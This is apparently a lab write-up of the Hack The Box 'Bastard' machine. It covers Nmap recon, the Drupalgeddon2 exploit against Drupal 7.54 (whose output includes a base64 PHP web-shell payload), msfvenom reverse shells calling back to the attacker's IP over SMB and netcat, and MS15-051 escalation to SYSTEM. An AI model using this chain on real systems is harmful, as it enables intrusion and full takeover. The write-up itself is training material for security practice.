My first step was to perform an Nmap scan against the machine:
# Nmap 7.91 scan initiated Fri Dec 18 14:03:28 2020 as: nmap -sV -sC -p- -oN scan -O 10.10.10.9 Nmap scan report for 10.10.10.9 Host is up (0.029s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 7.5 |_http-generator: Drupal 7 (http://drupal.org) | http-methods: |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Microsoft-IIS/7.5 |_http-title: Welcome to 10.10.10.9 | 10.10.10.9 135/tcp open msrpc Microsoft Windows RPC 49154/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|phone|specialized Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|7|8.1|Vista|2012 (92%) OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012 Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows 7 or Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Dec 18 14:08:24 2020 -- 1 IP address (1 host up) scanned in 296.09 seconds
We can see from the output that there are a number of ports open. HTTP on port 80 running Drupal, Also 135 and 49154 running MSRPC. I decided to start with port 80 as this is the one I’m most familiar with.
By browsing to http://10.10.10.9/CHANGELOG.txt you can see that it is running drupal version 7.54. I used searchsploit to identify vulnerabilities in this version of Drupal.
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171] └─# searchsploit drupal 7 --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/11060.txt Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1) | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2) | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution) | php/webapps/35150.php Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting | php/webapps/25493.txt Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting | php/webapps/35397.txt Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload | php/webapps/37453.php Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple Vulnerabilities | php/webapps/35072.txt Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results
After some trial and error I discovered that the “Drupalgeddon2” exploit 44449.rb was successfull.
┌──(root💀kali)-[/home/kali/Documents/bastard] └─# ruby 44449 http://10.10.10.9 2 ⚙ ruby: warning: shebang line ending with \r may cause problems [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.9/ -------------------------------------------------------------------------------- [+] Found : http://10.10.10.9/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.54 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [+] Result : Clean URLs enabled -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo YVSJVABF [+] Result : YVSJVABF [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.10.10.9/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Existing file (http://10.10.10.9/sites/default/files/shell.php) [i] Response: HTTP 404 // Size: 12 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (sites/default/files/) [*] Moving : ./sites/default/files/.htaccess [i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/shell.php [!] Target is NOT exploitable [2-4] (HTTP Response: 404)... Might not have write access? [!] FAILED : Couldn't find a writeable web path -------------------------------------------------------------------------------- [*] Dropping back to direct OS commands drupalgeddon2>> whoami nt authority\iusr drupalgeddon2>>
You can see from the output that a shell was spawned and I was logged in as the user isur. This shell however wasnt persistent. So I generated a reverse shell in msfvenom:
┌──(root💀kali)-[/var/www] └─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2600 -f exe > reverse.exe 1 ⚙ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes
I then started an SMB server on the kali machine to host the reverse.exe reverse shell I just created:
──(root💀kali)-[/var/www] └─# python3 smbserver.py testshare -smb2support /var/www/
I then started a netcat listener on the kali machine port port 2600 to capture the reverse shell.
┌──(root💀kali)-[/home/kali] └─# nc -nvlp 2600 1 ⨯ 1 ⚙ listening on [any] 2600 ...
The reverse shell was then downloaded to the Bastard machine using the drupalgeddon2 shell and executed.
drupalgeddon2>> copy \\10.10.14.19\testshare\reverse.exe 1 file(s) copied. drupalgeddon2>> reverse.exe
From the output below, you can see that the shell was successfully captured in netcat, and the user flag was captured.
┌──(root💀kali)-[/home/kali]
└─# nc -nvlp 2600 1 ⨯ 1 ⚙
listening on [any] 2600 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49739
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>cd /users
cd /users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 07:35 �� <DIR> .
19/03/2017 07:35 �� <DIR> ..
19/03/2017 01:20 �� <DIR> Administrator
19/03/2017 01:54 �� <DIR> Classic .NET AppPool
19/03/2017 07:35 �� <DIR> dimitris
14/07/2009 06:57 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.807.498.752 bytes free
C:\Users>cd dimitris
cd dimitris
C:\Users\dimitris>cd Desktop
cd Desktop
C:\Users\dimitris\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\dimitris\Desktop
19/03/2017 08:04 �� <DIR> .
19/03/2017 08:04 �� <DIR> ..
19/03/2017 08:06 �� 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 30.807.498.752 bytes free
C:\Users\dimitris\Desktop>type user.txt
type user.txt
[REDACTED]
The next step was to esclate privilages. I ran systeminfo and discovered that it was an unpatched Server 2008 machine.
C:\Users\dimitris\Desktop>systeminfo
systeminfo
Host Name: BASTARD
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00496-001-0001283-84782
Original Install Date: 18/3/2017, 7:04:46 ��
System Boot Time: 27/12/2020, 3:37:18 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2.047 MB
Available Physical Memory: 1.536 MB
Virtual Memory: Max Size: 4.095 MB
Virtual Memory: Available: 3.530 MB
Virtual Memory: In Use: 565 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.9
Because of this, there are multiple kernel exploits that should be successful in escalating privilages. I decided to try MS15-015 as I had had some luck with this exploit in the past. I downloaded the ZIP file from the github page, extracted the 64bit exe and copied it into /var/www so it can be transfered to the Bastard machine.
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# unzip MS15-051-KB3045171.zip
Archive: MS15-051-KB3045171.zip
creating: MS15-051-KB3045171/
inflating: MS15-051-KB3045171/ms15-051.exe
inflating: MS15-051-KB3045171/ms15-051x64.exe
creating: MS15-051-KB3045171/Source/
creating: MS15-051-KB3045171/Source/ms15-051/
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.cpp
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.filters
inflating: MS15-051-KB3045171/Source/ms15-051/ms15-051.vcxproj.user
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ntdll64.lib
inflating: MS15-051-KB3045171/Source/ms15-051/ReadMe.txt
creating: MS15-051-KB3045171/Source/ms15-051/Win32/
inflating: MS15-051-KB3045171/Source/ms15-051/Win32/ms15-051.exe
creating: MS15-051-KB3045171/Source/ms15-051/x64/
inflating: MS15-051-KB3045171/Source/ms15-051/x64/ms15-051x64.exe
inflating: MS15-051-KB3045171/Source/ms15-051.sln
inflating: MS15-051-KB3045171/Source/ms15-051.suo
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# ls
MS15-051-KB3045171 MS15-051-KB3045171.zip
┌──(root💀kali)-[/home/kali/Downloads/ms15-051]
└─# cd MS15-051-KB3045171
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# ls
ms15-051.exe ms15-051x64.exe Source
┌──(root💀kali)-[/home/kali/Downloads/ms15-051/MS15-051-KB3045171]
└─# cp ms15-051x64.exe /var/www
When this exe is run, it takes the command you want to execute as the argument. So I decided to create another reverse shell going to port 2602 on the Kali machine. This is what I execute as the argument of the MS15-051 exploit. I essentially get a SYSTEM privilage reverse shell. I created the reverse shell:
┌──(root💀kali)-[/var/www] └─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=2602 -f exe > reverse2602.exe 1 ⚙ [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of exe file: 73802 bytes
Then on the Bastard machine copied both the reverse shell and the MS15-051 exploit to the machine.
C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\ms15-051x64.exe
copy \\10.10.14.19\testshare\ms15-051x64.exe
1 file(s) copied.
C:\inetpub\drupal-7.54>copy \\10.10.14.19\testshare\reverse2602.exe
copy \\10.10.14.19\testshare\reverse2602.exe
1 file(s) copied.
A new netcat listener was then started on the kali machine listening on port 2602 to capture the new reverse shell.
┌──(root💀kali)-[/var/www] └─# nc -nvlp 2602 listening on [any] 2602 ...
The exploit was then run:
C:\inetpub\drupal-7.54>ms15-051-x64.exe "reverse2602.exe" ms15-051-x64.exe "reverse2602.exe" 'ms15-051-x64.exe' is not recognized as an internal or external command, operable program or batch file. C:\inetpub\drupal-7.54>ms15-051x64.exe "reverse2602.exe" ms15-051x64.exe "reverse2602.exe" [#] ms15-051 fixed by zcgonvh [!] process with pid: 624 created. ==============================
You can see from the output berlow, the reverse system shell was successfully captured and was able to capture the root flag.
┌──(root💀kali)-[/var/www]
└─# nc -nvlp 2602
listening on [any] 2602 ...
connect to [10.10.14.19] from (UNKNOWN) [10.10.10.9] 49681
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\inetpub\drupal-7.54>whoami
whoami
nt authority\system
C:\inetpub\drupal-7.54>cd /
cd /
C:\>cd Users
cd Users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users
19/03/2017 07:35 �� <DIR> .
19/03/2017 07:35 �� <DIR> ..
19/03/2017 01:20 �� <DIR> Administrator
19/03/2017 01:54 �� <DIR> Classic .NET AppPool
19/03/2017 07:35 �� <DIR> dimitris
14/07/2009 06:57 �� <DIR> Public
0 File(s) 0 bytes
6 Dir(s) 30.807.498.752 bytes free
C:\Users>cd Administrator
cd Administrator
C:\Users\Administrator>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator
19/03/2017 01:20 �� <DIR> .
19/03/2017 01:20 �� <DIR> ..
19/03/2017 01:20 �� <DIR> Contacts
19/03/2017 07:33 �� <DIR> Desktop
19/03/2017 02:09 �� <DIR> Documents
19/03/2017 12:42 �� <DIR> Downloads
19/03/2017 01:20 �� <DIR> Favorites
19/03/2017 01:20 �� <DIR> Links
19/03/2017 01:20 �� <DIR> Music
19/03/2017 01:20 �� <DIR> Pictures
19/03/2017 01:20 �� <DIR> Saved Games
19/03/2017 01:20 �� <DIR> Searches
19/03/2017 01:20 �� <DIR> Videos
0 File(s) 0 bytes
13 Dir(s) 30.807.498.752 bytes free
C:\Users\Administrator>cd Desktop
cd Desktop
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 605B-4AAA
Directory of C:\Users\Administrator\Desktop
19/03/2017 07:33 �� <DIR> .
19/03/2017 07:33 �� <DIR> ..
19/03/2017 07:34 �� 32 root.txt.txt
1 File(s) 32 bytes
2 Dir(s) 30.807.498.752 bytes free
C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
[REDACTED]